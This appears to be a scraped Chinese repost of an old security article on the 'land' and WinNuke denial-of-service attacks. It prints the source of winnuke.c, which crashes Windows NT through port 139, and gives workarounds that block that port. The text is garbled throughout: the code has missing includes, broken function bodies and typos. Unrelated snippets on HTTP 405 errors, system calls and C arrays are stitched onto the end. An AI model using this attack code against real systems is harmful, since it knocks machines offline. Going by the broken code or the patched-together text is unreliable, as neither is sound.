xundi (xundi_at_xfocus.org)
從紅色力量中**--見我們的連線
利用處理程式錯誤攻擊(下)
3 land攻擊工具
land也是乙個很厲害的攻擊工具,有人專門用land對某種路由器進行了測試,結果發現,當對23埠進行
攻擊,路由器再也不能連到本地網上或域網外部。前面面板上的燈也停止了閃爍,用ping沒有響應,
tenlnet命令也無效。此時,唯一的選擇便是來乙個硬重啟動。如下是對land攻擊cisco路由器的一番描述:
「當攻擊埠23時,它果然鎖住了路由器,此時,路由器再也不能到達內部的區域網,同樣也不能到達外
部的廣域網,前面面板上的燈也停止了閃動,這時候,也不能ping通它,也不能telnet到它。唯一的選擇
只有來乙個硬重啟動。「
可以說對許多使用cisco路由器的網路來說,這一點是非常可怕的。
更有人專門用land對當前流行的作業系統進行了一番測試,結果是land可攻擊的物件竟然包括了相當多的
作業系統,諸如aix3、hp-ux 10。20、irix windows 95和windows nt等當前流行的作業系統。
更為危險的是,在現在的網上,諸如teardrop.c 、bonk.c(55埠)、bionk.c和ssping.c一類的攻擊埠
的源程式到處都是,從編寫得很完善的,到一些個人自己編寫的簡陋的測試程式。任何感興趣的人,都可
以稍微工花費一些時間研究一下,就可以將他們變成自己的工具。因此,對於系統不是最新的或者還沒有
打過「補丁」,對自己的系統打「補丁」確實是當務之急。
4 oob攻擊工具
5.1 攻擊**
oob是一種專門攻擊windows nt139埠的工具。下面是它的乙個可用的版本。可以用它來檢測自己系統的
安全性。
/* winnuke.c – (05/07/97) by –eci */
/* tested on linux 2.0.30,sunos 5.5.1, and bsdi 2.1 */
#include
#include
#include
#include
#include
#include
#include
#define dport 139 /*attack port; 139 is what we want */
int x,s;
char str =」bye」; /makes no diff */
struct sockaddr-in addr, spoofedaddr;
atruct hostent *host;
int opdn-sock(int scok, char *server,int port)
else
}if (connect (sock,(struct sockaddr *)&blah,16)==-1)
void main (int argc,char *argv)
if ((s =socket(af-inet,sock-stream, ipproto-tcp)) =-1)
open-sock(s,argv[1],dport);
printf(「sending crash …」);
send (s, str, atrldn (str),msg-oob);
usleep (100000);
printf(「done!/n」);
close(s);
}10.5.2 一些臨時措施
目前有三種臨時性的解決方案可用。前兩種的後果是使用者只能使用拔號網路而無法再使用區域網了,
第三種方法通過包過濾,來阻止對聯39埠的訪問。因為它需要網絡卡的支援,所以只用於區域網內部。
方法一:
1. 進入[控制面板]視窗---[網路]對話方塊---[繫結]選項卡。
2. 開啟[顯示繫結屬於]列表,選擇[所有介面卡]。
4. 單擊[禁用]按鈕。
5. 確認後,重新啟動系統。
需要注意的是,當登入進windows nt 4。0時,就會有乙個訊息框,說明有一些服務或者驅動沒有啟動。
這是正常的,而且每次啟動時都會有。
方法二:
1. 進入[控制面板],找到[裝置]圖示。
2. 到列表的底部,找到[wins客戶(tcp/ip)]。
3. 單擊[停止]按鈕,然後單擊[關閉]按鈕。
4. 重啟系統。
這種方法更簡潔地實現了第一種方法,但是對一些區域網內的使用wins tcp/ip客戶來說這是乙個災難了。
所以要與系統管理員聯絡,以決定這樣做是否必要
方法三:
windows nt4。0提供了乙個選項,可以對埠進行過濾。這可以用來對目標埠是非曲直39的那些資料報
進行過濾。需要知道的是這種方法將對使用netbios產生一些不必要的***。
1. 進入[控制面板] ,選擇[網路]/[協議]/[tcp/ip] 單擊[屬性] 按扭。
2. 在ip位址表中,選擇[高階]按扭。
3. 在[高階]的tcp/ip屬性對話方塊中,選擇封鎖哪些埠,允許哪些埠繼續使用。
4. 單擊[確定],然後退出,重啟動系統。
介面呼叫處理,http請求405錯誤
每個介面呼叫都有自己環境,先排查原因 問題使用者反饋,上傳文件非常緩慢 檢視實時日誌如下 分析日誌,發現乙個外調介面連線超時。介面 一直請求超時,網路許可權,是否開通有申請過網路許可權,這個原有常用位址,有許可權。curl命令訪問檢視,405方法不允許,顯示get請求不允許 排查介面對接,是否不是p...
5 3 系統呼叫 系統呼叫處理程式
通知核心的機制是靠軟中斷實現的 通過引發乙個異常來促使系統切換到核心態去執行異常處理程式。此時的異常處理程式實際上就是系統呼叫處理程式。5.3.1 指定恰當的系統呼叫 因為所有的系統呼叫陷入核心的方式都一樣,所以僅僅是陷入核心空間是不夠的。因此必須把系統呼叫號一併傳給核心。system call 函...
TOC 第六章 利用 處理資料
例6 1 對十個陣列依次賦值為0 1 3 4 5 6 7 8 9要求按逆序輸出。include intmain 執行結果如下 例6.2用數列來處理斐波那契數列問題 include intmain for i 2 i 20 i f i f i 2 f i 1 for i 0 i 20 i printf...